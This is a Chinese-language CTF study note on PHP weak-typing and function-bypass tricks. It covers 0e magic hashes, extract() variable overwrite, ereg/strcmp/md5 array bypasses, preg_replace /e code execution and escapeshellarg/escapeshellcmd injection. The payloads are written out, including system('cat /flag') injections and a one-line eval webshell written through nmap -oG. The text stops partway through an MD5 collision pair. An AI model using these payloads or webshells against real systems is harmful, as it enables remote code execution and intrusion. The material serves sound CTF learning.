前言：

做web题时经常会遇到各种php弱类型和一些函数的绕过方法，由于知识比较零碎，就总结一下我所遇到的，也方便自己以后观看。

0x00:弱类型介绍：

弱类型是可以随意转换变量的类型,也就是说php并不会验证变量的类型，可以随时的转换类型，虽然提升了效率，但是引发了很多安全问题。

0x01:Hash比较缺陷

简单介绍：

PHP在处理哈希字符串时，通过!=或==来对哈希值进行比较，它把每一个以0e开头的哈希值都解释为0，所以如果两个不同的密码经过哈希以后，其哈希值都是以0e开头的，那么PHP将会认为他们相同，都是0

具体实例：

审计代码，我们输入的不能相等，但md5却需要相等，这明显的就是利用Hash的比较缺陷来做

我们只要找出两个数再md5加密后都为0e开头的即可，常用的有以下几种

QNKCDZO
0e830400451993494058024219903391
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675

所以构造a=QNKCDZO&b=s878926199a即可绕过

0x02：extract变量覆盖

简单介绍：

extract() 函数使用数组键名作为变量名，使用数组键值作为变量值，当变量中有同名的元素时，该函数默认将原有的值给覆盖掉。这就造成了变量覆盖

具体实例：

POST方法传输进来的值通过extrace()函数处理，我们不知道pass、thepassword_123的值，直接传入以POST的方式传入pass=1&thepassword_123=1就可以进行将原本的变量覆盖，并且使两个变量相等即可。

0x03:ereg正则%00截断及strpos、ereg用数组返回NULL

简单介绍：

ereg()函数搜索由指定的字符串作为由模式指定的字符串，如果发现模式则返回true，否则返回false，搜索对于字母字符是区分大小写的，用于正则表达式匹配。

一、ereg()函数存在NULL截断漏洞,可以%00截断，遇到%00则默认为字符串的结束，所以可以绕过一些正则表达式的检查。
二、ereg()只能处理字符串的，遇到数组做参数返回NULL。
三、空字符串的类型是string，NULL的类型是NULL,false、true是boolean类型
四、strpos()函数如果传入数组，便会返回NULL

具体实例：

这道题也涉及了===和!==,不了解的可以去官方文档查看一下：

审计一下代码，第一个if语句要求我们输入的值进行首尾匹配必须是1-9之间的数字，第二个if语句又让我们利用strpos() 函数查找相应的字符串在输入的值中第一次出现的位置，且后面是!==，所以要不让值相等类型不同，或是值不同类型相同即可。

但strpos()函数如果传入数组，便会返回NULL。利用这个漏洞，便可以构造出绕过的payload：

?nctf[]=1

ereg()函数返回NULL，===判断NULL和FALSE是不相等的(类型不同)，所以进入第二个语句,因为strpos处理数组时，也是返回NULL，又因为NULL!==FALSE条件成立所以得出flag

除此之外，还可以构造利用%00来构造payload：

?nctf=123%00%23biubiubiu

0x04:strcmp比较字符串

简单介绍：

strcmp()函数比较两个字符串(区分大小写）,定义中是比较字符串类型的，但如果输入其他类型这个函数将发生错误，在官方文档的说明中说到在php 5.2版本之前，利用strcmp函数将数组与字符串进行比较会返回-1，但是从5.3开始，会返回0。

具体实例:

审计代码，很简单关键就在于我们如何绕过检查，构造如下payload：

#POST DATA
pass[]=1

数组和字符进行比较结果不会返回1，即为false,加上非的作用，即可变成true,则满足条件

0x05:SESSION验证绕过

简单介绍：

在PHP配置中的默认情况下，Session是用Session ID来确定当前对话所对应的服务器Session，sessionID可在cookie中找到，当我们删除cookie中的sessionID后，$_SESSION[‘password’]就会返回空，我们同样传入空的password就能绕过了

具体实例：

观察代码发现需要我们GET传入的password和session中存储的password相同才可以得出flag，如果删掉session值，或者修改session值为一个不存在的session，服务器获取不到session，则password为空，这时候我们再GET进去一个空的password的进去拿到flag

0x06: sha()函数比较绕过、md5()函数绕过

简单介绍：

一、md5()函数获取不到数组的值，默认数组为0
二、sha1()函数无法处理数组类型，将报错并返回false

具体实例：

如果知道了sha1()函数不能处理数组，那这道题将非常好做，构造payload：

name[]=1&password[]=2

注意这里是===，不是==，所以这里采用md5()函数获取不到数组的值，默认数组为0这个特性来做，payload:

username[]=1&password[]=2

0x07:十六进制与数字比较

php在转码时会把16进制转化为十进制

payload:

?password=0xdeadc0de

0x08: preg_replace /e 模式下的代码执行

preg_replace：(PHP 5.5)
功能 ： 函数执行一个正则表达式的搜索和替换
定义 ： mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject )
搜索 subject 中匹配 pattern 的部分， 如果匹配成功以 replacement 进行替换
$pattern 存在 /e 模式修正符，允许代码执行
/e 模式修正符，是 preg_replace() 将 $replacement 当做php代码来执行

ZJCTF，不过如此

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;function complex($re, $str) {return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);
}foreach($_GET as $re => $str) {echo complex($re, $str). "\n";
}
function getFlag(){@eval($_GET['cmd']);
}

这里的代码便涉及到了preg_replace /e 模式下的代码执行，原理的话师傅讲的很明白，这里不再叙述
https://xz.aliyun.com/t/2557

直接放payload：

\S*=${phpinfo()}

得到flag

?\S*=${eval(getFlag())}&cmd=system('cat /flag');
#最后的分号要加，除此之外，也可以：
?\S*=${eval($_POST[lemon])}
#POST DATA
lemon=system('cat /flag');

0x09:绕过escapeshellarg+escapeshellcmd函数

原理分析：

模仿师傅的例子进行学习
谈谈escapeshellarg参数绕过和注入的问题

escapeshellarg

escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号，这样以确保能够直接将一个字符串传入shell 函数，并且还是确保安全的。

escapeshellcmd

escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。反斜线（\）会在以下字符之前插入： &#;`|?~<>^()[]{}$, \x0A 和 \xFF。 *’ 和 “ 仅在不配对儿的时候被转义。 在 Windows 平台上，所有这些字符以及 % 和 ! 字符都会被空格代替。

先通过例子来查看一下escapeshellarg函数的作用吧

<?php 
var_dump(escapeshellarg("123"));
var_dump(escapeshellarg("12'     3"));
?>

在解析单引号的时候 , 被单引号包裹的内容中如果有变量 , 这个变量名是不会被解析成值的，但是双引号不同 , bash 会将变量名解析成变量的值再使用。

所以即使参数用了 escapeshellarg 函数过滤单引号，但参数在拼接命令的时候如果用了双引号的话还是会导致命令执行的漏洞。

再来看一下escapeshellcmd 函数的作用

两个函数都会对单引号进行处理，但是有区别的,如下：

对于单个单引号, escapeshellarg 函数转义后,还会在左右各加一个单引号,但 escapeshellcmd 函数是直接加一个转义符，对于成对的单引号, escapeshellcmd 函数默认不转义,但 escapeshellarg 函数转义

那既然有这个差异，如果escapeshellcmd() 和 escapeshellarg() 一起出现会有什么问题
测试

结果

分析

一开始传入的参数
127.0.0.1' -v -d a=1
经过escapeshellarg函数处理，先转义再用单引号括起来
'127.0.0.1'\'' -v -d a=1'
再经过escapeshellcmd函数处理，数中的\以及a=1'中的单引号进行处理转义
'127.0.0.1'\\'' -v -d a=1\'
由于这一步的处理，使得\\被解释成了\而不再是转义字符，所以单引号配对连接之后将语句分割为三个部分

因此最后system函数是对127.0.0.1\发起请求，POST 数据为a=1'，如果两个函数翻过来则不会出现这个问题

接下来就通过一个题目来实践一下：

Online Tool

代码中是先使用了escapeshellarg函数，再使用escapeshellcmd函数便会引发上面的问题,再来仔细观察一下代码，发现mkdir\chadir函数，创建目录和改变当前的目录，应该是要我们写文件进去的，system()函数又是一串namp命令后面拼接上GET传入的参数，因为参数经过了上面的参数处理，；等都会被转义，所以就要从拼接的namp命令想办法了，查了百度谷歌没查到，看了WP才知道

nmap命令中 参数-oG可以实现将命令和结果写到文件（也就是可以写木马）

接下来就写payload，escapeshellarg函数会先对host变量中的单引号进行转义，并且转义之后，在 \' 的左右两边再加上单引号，变成 '\''

然后escapeshellcmd函数，会对host变量中的特殊字符进行转义

（&#;`|*?~<>^()[]{}$, \x0A//和\xFF以及不配对的单/双引号转义）

那么上面的 \ 就会被再次转义，比如变成 '\\''
如果在字符串首尾加上单引号，经过escapeshellarg函数之后，就可以实现将单引号给闭合了，在经过escapeshellcmd函数的时候单引号就是配对的，就不会进行转义

如：

' lemon shy '
escapeshellarg：''\'' lemon shy ''\''
escapeshellcmd: ''\\'' lemon shy ''\\''

这样就很好理解了，那就会可以实现单引号的逃逸了，接下来就来测试payload：

' <?php phpinfo();?> -oG 1.php'
如果最后的单引号是没有空格，则文件名后面就会多出\\，所以后面要加上空格
前面加空格不加则无影响，因为不会影响到一句话木马里面的内容

但还有一个问题，escapeshellcmd会把一句话木马中的一些字符给转义的，又该怎么办，测试一下在本地传一下发现虽然看起来转义了，但写入的话还是没有被转义的。

所以最终的payload:

' <?php @eval($_POST["a"]);?> -oG 1.php '
或
'<?php @eval($_POST["a"]);?> -oG 1.php '

创建的目录也出来了，写的一句话木马文件在该目录下，连接一下

得到flag

也可以传一个GET进去，调用system函数

' <?php @eval($_GET["a"]);?> -oG 2.php 'http://e5b384ba-6852-4e3f-9060-c66dc267e554.node3.buuoj.cn/8f9395193b358d86a100d2fd1f0349a2/2.php?a=system('cat /flag');

0x10:md5强类型

(string)$_POST['a1']!==(string)$_POST['a2']&& md5($_POST['a1'])===md5($_POST['a2'])}

例如这段代码，使用数组就不可行，因为最后转为字符串进行比较，所以只能构造两个MD5值相同的不同字符串.

两组经过url编码后的值

#1
a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
#2
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%